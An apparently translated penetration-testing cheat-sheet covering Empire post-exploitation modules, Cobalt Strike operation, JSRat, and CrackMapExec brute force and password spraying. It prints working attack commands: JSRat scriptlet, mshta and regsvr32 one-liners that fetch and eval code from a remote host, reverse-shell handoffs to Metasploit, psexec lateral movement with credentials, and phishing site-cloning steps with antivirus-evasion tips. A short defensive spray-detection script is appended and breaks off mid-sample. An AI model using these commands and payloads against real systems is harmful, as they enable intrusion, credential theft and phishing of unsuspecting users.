          collection/browser_data    Searches browser history or bookmarks
          collection/clipboard_monitor    Monitors the clipboard at a specified interval
          collection/file_finder    Finds sensitive files in the domain
          collection/find_interesting_file    Finds sensitive files in the domain
          collection/get_indexed_item    Retrieves Windows Desktop Search index items
          collection/get_sql_column_sample_data    Returns column information from the target SQL Server
          collection/get_sql_query    Executes a query on the target SQL Server
          collection/inveigh    Windows PowerShell LLMNR/mDNS/NBNS man-in-the-middle tool
          collection/keylogger    Logs keystrokes to keystrokes.txt; file location /downloads/agentname/keystrokes.txt/agentname
          collection/minidump    Full memory dump of a process, using PowerSploit's Out-Minidump.ps1
          collection/netripper    Injects NetRipper into the target process; it uses API hooking to intercept network traffic and encryption-related functions from a low-privileged user, capturing plaintext before encryption / after decryption as well as the encrypted traffic
          collection/ninjacopy*    Copies a file from an NTFS partition by reading the raw volume and parsing the NTFS structures
          collection/packet_capture*    Starts a packet capture on the host using netsh
          collection/prompt    Prompts the current user to enter credentials in a form box and returns the result
          collection/screenshot    Takes a screenshot
          collection/vaults/add_keepass_config_trigger    Looks for the KeePass configuration
          collection/vaults/find_keepass_config    Finds and parses KeePass.config.xml (2.X) and KeePass.config.xml (1.X) files
          collection/vaults/get_keepass_config_trigger    Extracts trigger specifications from KeePass 2.X configuration XML files
          collection/vaults/keethief    Retrieves the database master key information of unlocked KeePass databases
          collection/vaults/remove_keepass_config_trigger    Removes all triggers from every KeePass configuration found by Find-KeePassConfig
          >usemodule collection/    (Tab-complete to see the modules)
          >usemodule collection/screenshot    (screenshot of the current desktop; stored in ./Empire/download/<agent name>/screenshot)
          >usemodule collection/keylogger    (keylogger; stored in ./Empire/download/<agent name>/agent.log)
          >usemodule situational_awareness/host/winenum    (current user, AD groups, clipboard contents, OS version, shares, network information, firewall rules)
          >usemodule situational_awareness/network/powerview/share_finder    (list all shares in the domain)
          >usemodule situational_awareness/network/arpscan
          >set Range 192.168.0.1-192.168.0.100    (ARP scan; the network range must be set)
          >usemodule situational_awareness/network/portscan
          >set Hosts 192.168.0.1-192.168.0.100    (port scan; an IP or IP range must be set)
          >usemodule situational_awareness/network/reverse_dns    (DNS information; an IP must be set)
          >set Range 192.168.0.1-192.168.0.100
          >usemodule situational_awareness/network/powerview/get_domain_controller    (find the domain controllers)

          Code_execution (code execution)

          Module name    Function
          code_execution/invoke_dllinjection    Injects a DLL into a process ID of your choice using PowerSploit's Invoke-DLLInjection
          code_execution/invoke_metasploitpayload    Spawns a new hidden PowerShell window that downloads and executes a Metasploit payload; works together with the Metasploit module exploit/multi/scripts/web_delivery
          code_execution/invoke_ntsd    Executes the Empire launcher code using the NT Symbolic Debugger
          code_execution/invoke_reflectivepeinjection    Reflective PE injection using PowerSploit's Invoke-ReflectivePEInjection: loads a DLL/EXE into the PowerShell process, or a DLL into a remote process
          code_execution/invoke_shellcode    Injects shellcode using PowerSploit's Invoke-Shellcode
          code_execution/invoke_shellcodemsil    Executes shellcode

          Credentials (credentials)

          Module name    Function
          credentials/credential_injection*    Runs PowerSploit's Invoke-CredentialInjection to create a logon with plaintext credentials without triggering event ID 4648 (logon attempted with explicit credentials)
          credentials/enum_cred_store    Dumps the plaintext credentials of the current interactive user from Windows Credential Manager
          credentials/invoke_kerberoast    Requests Kerberos tickets for all users with a non-null service principal name (SPN) and extracts them in a John- or Hashcat-usable format
          credentials/powerdump*    Dumps hashes from the local system using Posh-SecMod's Invoke-PowerDump
          credentials/sessiongopher    Extracts saved WinSCP sessions and passwords
          credentials/tokens    Runs PowerSploit's Invoke-TokenManipulation to enumerate the available logon tokens and create new processes with them
          credentials/vault_credential*    Runs PowerSploit's Get-VaultCredential to display Windows Vault credential objects, including plaintext web credentials
          credentials/mimikatz/cache*    Runs PowerSploit's Invoke-Mimikatz function to extract MSCache(v2) hashes
          credentials/mimikatz/certs*    Runs PowerSploit's Invoke-Mimikatz function to extract all certificates to the local directory
          credentials/mimikatz/command*    Runs PowerSploit's Invoke-Mimikatz function with a custom command
          credentials/mimikatz/dcsync    Runs PowerSploit's Invoke-Mimikatz function to extract a given account's password via Mimikatz's lsadump::dcsync module
          credentials/mimikatz/dcsync_hashdump    Runs PowerSploit's Invoke-Mimikatz function to collect all domain hashes using Mimikatz's lsadump::dcsync module
          credentials/mimikatz/extract_tickets    Runs PowerSploit's Invoke-Mimikatz function to extract Kerberos tickets from memory in base64-encoded form
          credentials/mimikatz/golden_ticket    Runs PowerSploit's Invoke-Mimikatz function to generate a golden ticket and inject it into memory
          credentials/mimikatz/keys*    Runs PowerSploit's Invoke-Mimikatz function to extract all keys to the local directory
          credentials/mimikatz/logonpasswords*    Runs PowerSploit's Invoke-Mimikatz function to extract plaintext credentials from memory
          credentials/mimikatz/lsadump*    Runs PowerSploit's Invoke-Mimikatz function to extract a specific user's hash from memory; useful on a domain controller
          credentials/mimikatz/mimitokens*    Runs PowerSploit's Invoke-Mimikatz function to list or enumerate tokens
          credentials/mimikatz/pth*    Runs PowerSploit's Invoke-Mimikatz function to run sekurlsa::pth and create a new process
          credentials/mimikatz/purge    Runs PowerSploit's Invoke-Mimikatz function to purge all current Kerberos tickets from memory
          credentials/mimikatz/sam*    Runs PowerSploit's Invoke-Mimikatz function to extract hashes from the Security Account Manager (SAM) database
          credentials/mimikatz/silver_ticket    Runs PowerSploit's Invoke-Mimikatz function to generate a silver ticket for a server/service and inject it into memory
          credentials/mimikatz/trust_keys*    Runs PowerSploit's Invoke-Mimikatz function to extract the domain trust keys from a domain controller

          Exfiltration (data exfiltration)

          Module name    Function
          exfiltration/egresscheck    Helps check egress between the host and client systems; details: https://github.com/stufus/egresscheck-framework
          exfiltration/exfil_dropbox    Transfers files to Dropbox

          Exploitation (exploits)

          Module name    Function
          exploitation/exploit_eternalblue    MS17_010 EternalBlue exploit
          exploitation/exploit_jboss    JBoss exploit
          exploitation/exploit_jenkins    Runs commands on an unauthenticated Jenkins script console

Lateral_movement (lateral movement)

| Module | Function |
|---|---|
| lateral_movement/inveigh_relay | SMB relay attack |
| lateral_movement/invoke_dcom | Executes a stager on a remote host via DCOM |
| lateral_movement/invoke_executemsbuild | Uses WMI and MSBuild to compile and execute an XML file containing an Empire launcher |
| lateral_movement/invoke_psexec | Lateral movement via PsExec |
| lateral_movement/invoke_psremoting | Lateral movement via remote PowerShell |
| lateral_movement/invoke_smbexec | Lateral movement via SMBExec |
| lateral_movement/invoke_sqloscmd | Lateral movement via xp_cmdshell |
| lateral_movement/invoke_sshcommand | Lateral movement via SSH |
| lateral_movement/invoke_wmi | Lateral movement via WMI |
| lateral_movement/invoke_wmi_debugger | Uses WMI to set the debugger of a binary on a remote machine to cmd.exe or a stager |
| lateral_movement/jenkins_script_console | Lateral movement via an unauthenticated Jenkins script console |
| lateral_movement/new_gpo_immediate_task | Lateral movement via a scheduled task in a GPO |

Management (management)

| Module | Function |
|---|---|
| management/enable_rdp* | Enables RDP on the remote machine and adds a firewall exception |
| management/disable_rdp* | Disables RDP on the remote machine |
| management/downgrade_account | Sets reversible encryption on a given domain account, then forces the password to be set at the user's next logon |
| management/enable_multi_rdp* | Allows multiple users to hold simultaneous RDP connections |
| management/get_domain_sid | Returns the SID of the current or specified domain |
| management/honeyhash* | Injects artificial credentials into LSASS |
| management/invoke_script | Runs a custom script |
| management/lock | Locks the workstation display |
| management/logoff | Logs off the current user (or all users) from the machine |
| management/psinject | Uses PowerShell to inject Stephen Fewer's ReflectivePick, which executes PS code from memory in a remote process |
| management/reflective_inject | Uses PowerShell to inject Stephen Fewer's ReflectivePick, which executes PS code from memory in a remote process |
| management/restart | Restarts the specified machine |
| management/runas | Bypasses GPO path restrictions |
| management/shinject | Injects a PIC shellcode payload into a target process |
| management/sid_to_user | Converts a given domain SID to a user |
| management/spawn | Spawns a new agent in a new powershell.exe process |
| management/spawnas | Spawns an agent using the specified logon credentials |
| management/switch_listener | Switches the listener |
| management/timestomp | Invokes Set-MacAttribute to perform timestomp-like functionality |
| management/user_to_sid | Converts a given domain\user to a domain SID |
| management/vnc | Invoke-Vnc runs a VNC agent in memory and initiates a reverse connection |
| management/wdigest_downgrade* | Sets wdigest on the machine to use explicit credentials |
| management/zipfolder | Zips a target folder for later exfiltration |
| management/mailraider/disable_security | Checks the ObjectModelGuard |
| management/mailraider/get_emailitems | Returns all items in the specified folder |
| management/mailraider/get_subfolders | Returns a list of all folders under the specified top-level folder |
| management/mailraider/mail_search | Searches the given Outlook folder for items |
| management/mailraider/search_gal | Returns all Exchange users matching the specified search criteria |
| management/mailraider/send_mail | Sends an email to the specified address using a custom or default template |
| management/mailraider/view_email | Selects the specified folder and outputs the email item at the specified index |

Persistence (persistence)

| Module | Function |
|---|---|
| persistence/elevated/registry* | Machine startup persistence via HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run, running a stager or script |
| persistence/elevated/schtasks* | Scheduled task persistence |
| persistence/elevated/wmi* | WMI event subscription persistence |
| persistence/elevated/wmi_updater* | WMI subscription persistence |
| persistence/misc/add_netuser | Adds a domain user or local user to the current (or a remote) machine |
| persistence/misc/add_sid_history* | Runs PowerSploit's Invoke-Mimikatz function to execute misc::addsid and add SID history to a user. Domain controllers only |
| persistence/misc/debugger* | Sets the debugger for the specified target binary to cmd.exe |
| persistence/misc/disable_machine_acct_change* | Prevents the target system's machine account from automatically changing its password |
| persistence/misc/get_ssps | Enumerates all loaded security packages |
| persistence/misc/install_ssp* | Installs a security support provider DLL |
| persistence/misc/memssp* | Runs PowerSploit's Invoke-Mimikatz function to execute misc::memssp, logging all authentication events to C:\Windows\System32\mimisla.log |
| persistence/misc/skeleton_key* | Runs PowerSploit's Invoke-Mimikatz function to execute misc::skeleton, implanting Mimikatz's skeleton-key master password. Domain controllers only |
| persistence/powerbreach/deaduser | DeadUser backdoor; details: http://www.sixdub.net/?p=535 |
| persistence/powerbreach/eventlog* | Starts the event-loop backdoor |
| persistence/powerbreach/resolver | Starts the resolver backdoor |
| persistence/userland/backdoor_lnk | LNK file backdoor |
| persistence/userland/registry | Machine startup persistence via HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run, running a stager or script |
| persistence/userland/schtasks | Scheduled task persistence |

Privesc (privilege escalation)

| Module | Function |
|---|---|
| privesc/ask | Pops up a dialog asking the user whether to run PowerShell as administrator |
| privesc/bypassuac | UAC bypass |
| privesc/bypassuac_env | UAC bypass |
| privesc/bypassuac_eventvwr | UAC bypass |
| privesc/bypassuac_fodhelper | UAC bypass |
| privesc/bypassuac_sdctlbypass | UAC bypass |
| privesc/bypassuac_tokenmanipulation | UAC bypass |
| privesc/bypassuac_wscript | UAC bypass |
| privesc/getsystem* | Obtains SYSTEM privileges |
| privesc/gpp | Exploits the Windows Group Policy Preferences flaw to obtain system accounts |
| privesc/mcafee_sitelist | Looks for plaintext passwords in McAfee SiteList.xml files |
| privesc/ms16-032 | MS16-032 local privilege escalation |
| privesc/ms16-135 | MS16-135 local privilege escalation |
| privesc/tater | Hot Potato privilege escalation implemented in PowerShell |
| privesc/powerup/allchecks | Checks the target host for privilege-escalation attack vectors |
| privesc/powerup/find_dllhijack | Finds generic .DLL hijacks |
| privesc/powerup/service_exe_restore | Restores a backed-up service binary |
| privesc/powerup/service_exe_stager | Backs up a service's binary and replaces the original with a binary that launches stager.bat |
| privesc/powerup/service_exe_useradd | Modifies the target service to create a local user and add it to local administrators |
| privesc/powerup/service_stager | Modifies the target service to execute an Empire stager |
| privesc/powerup/service_useradd | Modifies the target service to create a local user and add it to local administrators |
| privesc/powerup/write_dllhijacker | Writes a hijackable .dll, together with the stager.bat the .dll calls, to the specified path. wlbsctrl.dll works well on Windows 7. Requires a reboot |

Recon (reconnaissance)

| Module | Function |
|---|---|
| recon/find_fruit | Searches a network range for potentially vulnerable web services |
| recon/get_sql_server_login_default_pw | Discovers SQL Server instances within the current broadcast domain |
| recon/http_login | Tests credentials against basic authentication |

Situational_awareness (situational awareness)

| Module | Function |
|---|---|
| situational_awareness/host/antivirusproduct | Gets antivirus product information |
| situational_awareness/host/computerdetails* | Enumerates useful information about the system |
| situational_awareness/host/dnsserver | Enumerates the DNS servers the system uses |
| situational_awareness/host/findtrusteddocuments | Enumerates the relevant registry keys (trusted documents) |
| situational_awareness/host/get_pathacl | Enumerates the ACL of a given file path |
| situational_awareness/host/get_proxy | Enumerates the current user's proxy server and WPAD contents |
| situational_awareness/host/get_uaclevel | Enumerates the UAC level |
| situational_awareness/host/monitortcpconnections | Monitors the host's TCP connections to a specified domain name or IPv4 address; useful for session hijacking and for finding users interacting with sensitive services |
| situational_awareness/host/paranoia* | Continuously checks the running processes for suspicious users |
| situational_awareness/host/winenum | Collects information about the host and the current user context |
| situational_awareness/network/arpscan | Performs an ARP scan against a given range of IPv4 addresses |
| situational_awareness/network/bloodhound | Performs BloodHound data collection |
| situational_awareness/network/get_exploitable_system | Queries Active Directory for systems likely vulnerable to Metasploit exploits |
| situational_awareness/network/get_spn | Gets service principal names (SPNs) |
| situational_awareness/network/get_sql_instance_domain | Returns a list of SQL Server instances |
| situational_awareness/network/get_sql_server_info | Returns basic server and user information from the target SQL Server |
| situational_awareness/network/portscan | Simple port scan using regular sockets |
| situational_awareness/network/reverse_dns | Performs reverse DNS lookups for a given IPv4 range |
| situational_awareness/network/smbautobrute | Runs an SMB brute force against a username/password list |
| situational_awareness/network/smbscanner | Tests a username/password combination on multiple machines |
| situational_awareness/network/powerview/find_foreign_group | Enumerates all members of the groups of a given domain and finds users that are not in the queried domain |
| situational_awareness/network/powerview/find_foreign_user | Enumerates users who are in groups outside their home domain |
| situational_awareness/network/powerview/find_gpo_computer_admin | Takes a computer (or GPO) object and determines which users/groups have administrative access to it |
| situational_awareness/network/powerview/find_gpo_location | Takes a user or group name and determines which machines it has administrative access to through GPOs |
| situational_awareness/network/powerview/find_localadmin_access | Finds machines in the local domain where the current user has local administrator access |
| situational_awareness/network/powerview/find_managed_security_group | Retrieves all security groups in the domain |
| situational_awareness/network/powerview/get_cached_rdpconnection | Uses the remote registry to query all "Windows Remote Desktop Connection client" information on a machine |
| situational_awareness/network/powerview/get_computer | Queries the domain for the current computer objects |
| situational_awareness/network/powerview/get_dfs_share | Returns a list of all fault-tolerant distributed file systems for a given domain |
| situational_awareness/network/powerview/get_domain_controller | Returns the domain controllers for the current or specified domain |
| situational_awareness/network/powerview/get_domain_policy | Returns the default domain or DC policy for a given domain or domain controller |
| situational_awareness/network/powerview/get_domain_trust | Returns all domain trusts for the current or specified domain |
| situational_awareness/network/powerview/get_fileserver | Returns a list of all file servers extracted from users' home directories |
| situational_awareness/network/powerview/get_forest | Returns information about a given domain forest |
| situational_awareness/network/powerview/get_forest_domain | Returns all domains of a given forest |
| situational_awareness/network/powerview/get_gpo | Gets a list of all current GPOs in the domain |
| situational_awareness/network/powerview/get_group | Gets a list of all current groups in the domain |
| situational_awareness/network/powerview/get_group_member | Returns the members of a given group |
| situational_awareness/network/powerview/get_localgroup | Returns a list of all current users in a specified local group on the local or a remote machine |
| situational_awareness/network/powerview/get_loggedon | Executes the NetWkstaUserEnum Win32 API call to query the users actively logged on to a host |
| situational_awareness/network/powerview/get_object_acl | Returns the ACL associated with a specific Active Directory object |
| situational_awareness/network/powerview/get_ou | Gets a list of all current OUs in the domain |
| situational_awareness/network/powerview/get_rdp_session | Queries active sessions and originating IPs on a given RDP remote service |
| situational_awareness/network/powerview/get_session | Executes the NetSessionEnum Win32 API call to query active sessions on a host |
| situational_awareness/network/powerview/get_site | Gets a list of all current sites in the domain |
| situational_awareness/network/powerview/get_subnet | Gets a list of all current subnets in the domain |
| situational_awareness/network/powerview/get_user | Queries information for a given user or for the users in the specified domain |
| situational_awareness/network/powerview/map_domain_trust | Maps all reachable domain trusts with .CSV output |
| situational_awareness/network/powerview/process_hunter | Queries the process lists of remote machines |
| situational_awareness/network/powerview/set_ad_object | Queries the specified domain object by SID, name, or SamAccountName |
| situational_awareness/network/powerview/share_finder | Finds shares on machines in the domain |
| situational_awareness/network/powerview/user_hunter | Finds the machines where users of a specified group are logged on |

Trollsploit (pranks)

| Module | Function |
|---|---|
| trollsploit/get_schwifty | Plays the Schwifty video while setting the computer volume to maximum |
| trollsploit/message | Sends a message box |
| trollsploit/process_killer | Kills any process whose name starts with a given string |
| trollsploit/rick_ascii | Spawns a new powershell.exe process running Lee Holmes' ASCII Rick Roll |
| trollsploit/rick_astley | Runs SadProcessor's beeping rickroll |
| trollsploit/thunderstruck | Plays the Thunderstruck video while setting the computer volume to maximum |
| trollsploit/voicetroll | Reads text aloud with the synthesized voice on the target |
| trollsploit/wallpaper | Uploads a .jpg image to the target machine and sets it as the desktop wallpaper |
| trollsploit/wlmdr | Shows a balloon tip in the taskbar |

Empire Word

>usestager windows/launcher_bat  generates a bat trojan; set the Listener.
Word/Excel -> Insert -> Object -> Create from File, select the bat, tick "Display as icon", change the icon.
Macro:
>usestager windows/macro  set the Listener.
Word/Excel -> View -> Macros -> Create, paste the macro in.

Empire spawning to Cobalt Strike and MSF

Spawning to MSF
Can bypass AV.
Empire> usemodule code_execution/invoke_shellcode
> set Lhost 192.168.0.1
> set Lport 4444
> set Payload reverse_http
MSF> use exploit/multi/handler
> set payload windows/meterpreter/reverse_http
> set Lhost 192.168.31.247
> set lport 4444
> run
Or:
Empire> usemodule code_execution/invoke_metasploitpayload
> set URL http://SRVHOST:SRVPORT
MSF# use exploit/multi/script/web_delivery
# set payload windows/x64/meterpreter/reverse_tcp
Set SRVHOST and SRVPORT.
Spawning to Cobalt Strike
Create a listener windows/beacon_http/reverse_http and set the port and host.
Empire> usemodule code_execution/invoke_shellcode
> set Lhost 192.168.0.1
> set Lport 4444
> set Payload reverse_http

Cobalt Strike

Installation

Requires a JDK:
>tar -xzvf jdk-8u191-linux-x64.tar.gz

Deploying the TeamServer

>./teamserver 192.168.0.107 123456
The format is external IP followed by the password.

Menus

New Connection: open a new connection
Preferences: appearance settings
Visualization: view hosts in different forms
VPN Interfaces: VPN interfaces
Listeners: listeners
Script Interfaces: view and load CNA scripts
Close: close CS

Connecting

Listeners

Create: Cobalt Strike -> Listeners, click Add.
Beacon is CS's internal listener; Foreign is generally used together with MSF. Note the system architectures supported.

Attack modules

| Name | Function |
|---|---|
| HTML Application | PowerShell-based HTML Application trojan in .hta format; three variants: executable, PowerShell, VBA |
| MS Office Macro | Office macro file |
| Payload Generator | Payloads in C, C#, COM Scriptlet, Java, Perl, PowerShell, Python, Ruby, VBA and other languages |
| USB/CD AutoPlay | Trojan run via USB/CD autoplay |
| Windows Dropper | Binder |
| Windows Executable | Generates 32-bit or 64-bit exe, service-based executables, DLLs and other backdoors |
| Windows Executable(S) | Generates stageless executables; supports PowerShell scripts; provides proxy options |
| Web Drive-by | Web-based attack modules |

| Name | Function |
|---|---|
| Manage | Manage the started modules |
| Clone Site | Clone a website |
| Host File | Host a file for download |
| Scripted Web Delivery | Web-based attack payload |
| Signed Applet Attack | Runs a Java self-signed applet attack |
| Smart Applet Attack | Auto-detects the Java version and attacks with known exploits |
| System Profiler | Information-gathering module |

View modules

Applications: shows application information for the target machine
Credentials: shows passwords (obtained by hashdump and mimikatz)
Downloads: downloaded files
Event Log: event log
Keystrokes: keylogger output
Proxy Pivots: proxy information
Screenshots: screenshots
Script Console: load scripts
Targets: view targets
Web Log: view the web log

Creating a PowerShell script

Copy the script to the target machine and run it; the host then checks in.

Interacting

Right-click the target machine and choose Interact to enter interactive mode.
Access
    Dump hashes: obtain passwords
    Elevate: privilege escalation
    Golden Ticket: inject a golden ticket into the session
    Make token: create a token
    Run Mimikatz: run mimikatz
    Spawn As: spawn a session as another user on the target
Explore
    Browser Pivot: hijack the browser
    Desktop (VNC): remote VNC
    File Browser: file management
    Net View: run the net view command
    Port scan: port scan
    Process list: process list
    Screenshot: screenshot
Pivoting
    SOCKS Server: proxy
    Listener: use the compromised machine as a listener (reverse port forward)
    Deploy VPN: deploy a VPN
Spawn
    Spawn a session: hand off to MSF or Armitage
Right-click and run mimikatz to obtain hashes and plaintext passwords.
View -> Credentials lists the passwords, similar to Empire's creds command.

Beacon

| Command | Function |
|---|---|
| argue | Process argument spoofing |
| blockdlls | Block non-Microsoft DLLs in child processes |
| browserpivot | Inject into the victim's browser process |
| bypassuac | Bypass UAC to elevate privileges |
| cancel | Cancel an in-progress download |
| cd | Change directory |
| checkin | Force the beacon to call home once |
| clear | Clear beacon's internal task queue |
| connect | Connect to a Beacon peer over TCP |
| covertvpn | Deploy the Covert VPN client |
| cp | Copy a file |
| dcsync | Extract password hashes from the DC |
| desktop | Remote desktop (VNC) |
| dllinject | Reflective DLL injection into a process |
| dllload | Load a DLL into a process with LoadLibrary |
| download | Download a file |
| downloads | List in-progress file downloads |
| drives | List the target's drives |
| elevate | Escalate privileges with an exploit |
| execute | Run a program on the target (no output) |
| execute-assembly | Run a local .NET program in memory on the target |
| exit | Terminate the beacon session |
| getprivs | Enable system privileges on current token |
| getsystem | Attempt to obtain SYSTEM |
| getuid | Get the user ID |
| hashdump | Dump password hashes |
| help | Help |
| inject | Spawn a session in an injected process |
| jobkill | Kill a background job |
| jobs | List background jobs |
| kerberos_ccache_use | Import tickets from a ccache file into this session |
| kerberos_ticket_purge | Purge this session's Kerberos tickets |
| kerberos_ticket_use | Import a ticket from a ticket file into this session |
| keylogger | Keylogger |
| kill | Kill a process |
| link | Connect to a Beacon peer over a named pipe |
| logonpasswords | Dump credentials and hashes with mimikatz |
| ls | List files |
| make_token | Create a token to pass credentials |
| mimikatz | Run mimikatz |
| mkdir | Create a directory |
| mode dns | Use DNS A records as the communication channel (DNS beacon only) |
| mode dns-txt | Use DNS TXT records as the communication channel (DNS beacon only) |
| mode dns6 | Use DNS AAAA records as the communication channel (DNS beacon only) |
| mode http | Use HTTP as the communication channel |
| mv | Move a file |
| net | net commands |
| note | Assign a note |
| portscan | Port scan |
| powerpick | Execute a command via Unmanaged PowerShell |
| powershell | Execute a command via powershell.exe |
| powershell-import | Import a PowerShell script |
| ppid | Set parent PID for spawned post-ex jobs |
| ps | Show the process list |
| psexec | Use a service to spawn a session on a host |
| psexec_psh | Use PowerShell to spawn a session on a host |
| psinject | Execute a PowerShell command in a specific process |
| pth | Pass-the-hash using Mimikatz |
| pwd | Current working directory |
| reg | Query the registry |
| rev2self | Revert to the original token |
| rm | Delete a file or folder |
| rportfwd | Port forwarding |
| run | Run a program on the target (returns output) |
| runas | Run a program as another user |
| runasadmin | Run a program in an elevated context |
| runu | Execute a program under another PID |
| screenshot | Screenshot |
| setenv | Set an environment variable |
| shell | Execute a cmd command |
| shinject | Inject shellcode into a process |
| shspawn | Spawn a process and inject shellcode into it |
| sleep | Set the sleep delay |
| socks | Start a SOCKS4 proxy |
| socks stop | Stop the SOCKS4 proxy |
| spawn | Spawn a session |
| spawnas | Spawn a session as another user |
| spawnto | Set executable to spawn processes into |
| spawnu | Spawn a session under another PID |
| ssh | Connect to a remote host via SSH |
| ssh-key | Connect to a remote host with an SSH key |
| steal_token | Steal a token from a process |
| timestomp | Apply one file's timestamps to another file |
| unlink | Disconnect from parent Beacon |
| upload | Upload a file |
| wdigest | Dump plaintext credentials with mimikatz |
| winrm | Lateral movement via WinRM |
| wmi | Lateral movement via WMI |

To execute a command in beacon mode, type shell followed by the command.
>sleep 0  interactive mode: commands run immediately
Inject a DLL into a process (the DLL must already be on the target):
>dllload [pid] [c:\path\to\file.dll]
>kerberos_ticket_purge  purge tickets
>kerberos_ccache_use [/path/to/file.ccache]  import tickets from a ccache file
>kerberos_ticket_use [/path/to/file.ccache]  import tickets from a ticket file
>kill pid  kill a process
>timestomp [fileA] [fileB]  change file timestamps
>getuid  get the current user
>steal_token [pid]  steal the token of the given process
>rev2self  revert to the original token
>powershell-import [/path/to/local/script.ps1]  import a PS module
>shinject [pid] <x86|x64> [/path/to/my.bin]  inject shellcode into a process
>socks port  start a proxy on the given port
>socks stop  stop the proxy
>rportfwd [bind port] [forward host] [forward port]  start port forwarding

Cloning a website

Attacks -> Web Drive-by -> System Profiler: set Redirect URL to the target site; after a successful login the user is redirected to the real site.
Phishing attack -> Clone Site: enter the site to clone as the clone address; under Attack, choose the site just profiled. The Web Log view records keystrokes.
Attacks -> Phishing attack management -> Web service management lets you kill the task just started.

Office macro



Phishing email

Clone a new website.
Embed URL: choose the cloned website.



The hyperlinks in the email are replaced with the URL cloned via Embed URL.


If an attachment is to be included, mind the attachment's AV evasion.

Loading scripts

https://github.com/rsmudge/ElevateKit  privilege-escalation scripts
>git clone https://github.com/rsmudge/ElevateKit.git
>git clone https://github.com/TheKingOfDuck/myScripts.git
Cobalt Strike -> Scripts, select elevate.cna; the privilege-escalation exploit list now includes the added modules.

Browser pivoting

Set the beacon to interactive mode:
beacon> sleep 0
[Beacon] -> Explore -> Browser Pivot; select the checkmarked process to inject into. A proxy is returned as server IP + port.
>chromium --no-sandbox --ignore-certificate-errors --proxy-server=SERVER_IP:PORT
Then browse to the site.

Persistence

https://github.com/DeEpinGh0st/Erebus
Load the CNA script: Cobalt Strike -> Script Manager -> Load -> Main.cna from Erebus.
Generate a payload: Attacks -> Packages -> Windows Executable(S).
Erebus -> Persistence: choose the persistence method.

Lateral movement

Scan for live hosts:
>portscan ip/range ports protocol(arp, icmp, none) threads
>portscan 192.168.1.0/24 445 arp 100
Or right-click the target -> Scan. Click View -> Targets in the toolbar to see the live hosts found by the port scan (targets can also be added manually). Login -> psexec performs a pass-the-hash login.

Isolated networks

Pivoting through a compromised machine
Pivoting -> Listener: create a listener on a machine you already control.



Choose Attacks -> Packages -> Windows Executable (Stageless).
Upload the generated payload to the compromised target, upload PsExec.exe, then:
beacon> shell C:\psexec.exe -accepteula \\10.1.1.105 -u administrator -p xxx -d -c C:\beacon.exe
SMB beacon
Create a bind listener windows/beacon_smb/bind_pipe, then run:
>psexec MACHINE_NAME ADMIN$/c$ bind
SSH login
>ssh 10.1.1.98:22 root admin

Proxying

>socks 690
View -> Proxy Pivots -> tunnel: copy it directly and paste it into MSF.

Deploying a VPN

Select the internal network interface.



Add



Delete

Cobalt Strike spawning to Empire and MSF

Spawning to Empire
Create a Listener, then create a stager:
>usestager windows/shellcode
Running it generates /tmp/launcher.bin.
In CS, use ps to find a process and inject into it (>shinject PID x64), choosing launcher.bin.
Spawning to MSF
Use CS's foreign listeners:
windows/foreign/reverse_dns_txt
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/foreign/reverse_tcp
Start the MSF listener. On the Cobalt Strike session host click Spawn, create a foreign listener, choose windows/foreign/reverse_tcp and specify the IP and port MSF is listening on.

JSRat

https://github.com/Hood3dRob1n/JSRat-Py
https://github.com/Ridter/MyJSRat
Start:
>python JSRat.py -i 192.168.0.107 -p 1234
MyJSRat can specify the command to execute with the -c parameter.
/connect is the callback address; /wtf is the code to execute.
Run directly on the target machine, or:
>regsvr32.exe /u /n /s /i:http://192.168.0.107:1234/file.sct scrobj.dll
JSRat then shows the host checking in.


WSC method
          <?xml version="1.0"?><package><component ><script language="JScript"><![CDATA[        rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://192.168.0.107:1234/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";        new ActiveXObject("WScript.Shell").Run(rat,0,true);]]></script></component></package> 
>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.0.107/jsrat.wsc")
Mshta method
>mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.0.107:1234/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

CrackMapExec

Information gathering

Return live hosts:
>crackmapexec smb 192.168.0.0/24

Brute force

Supported protocols: ssh, smb, winrm, mssql, http.
Brute-force the SMB protocol on two machines, one username with several passwords:
>crackmapexec smb 192.168.0.98 192.168.0.55 -u username1 -p password1 password2
>crackmapexec smb 192.168.0.0/24 -d zone.com -u y -p 'password' --shares
Password spraying:
>crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
Specifying wordlists:
>crackmapexec <protocol> <target(s)> -u /tmp/user.txt -p /tmp/pass.txt
Hash brute force:
>crackmapexec <protocol> <target(s)> -u /tmp/user.txt -H /tmp/ntlm.txt
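The two patterns above (one account with many passwords, or one password across many accounts) leave distinctive traces in failed-logon records. The following is an added example, not part of the original notes: a small Python detector run over constructed Windows-style failed-logon tuples (timestamp, source IP, target account) that flags a password spray (one source, many distinct accounts in a short window) separately from a single-account brute force. The sample records, thresholds and window sizes are assumptions chosen for illustration.

```python
"""Detect brute-force and password-spray patterns in constructed failed-logon records.

Added example, not part of the original notes. The records below are made up to
look like Windows failed-logon events: (ISO timestamp, source IP, target account).
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

Record = Tuple[str, str, str]  # (ISO timestamp, source IP, target user)

# Constructed sample: one source trying a guess against many accounts (spray),
# one source hammering a single account (brute force), plus a harmless typo.
SAMPLE_FAILED_LOGONS: List[Record] = [
    ("2024-01-29T07:51:00", "10.0.0.50", "alice"),
    ("2024-01-29T07:51:03", "10.0.0.50", "bob"),
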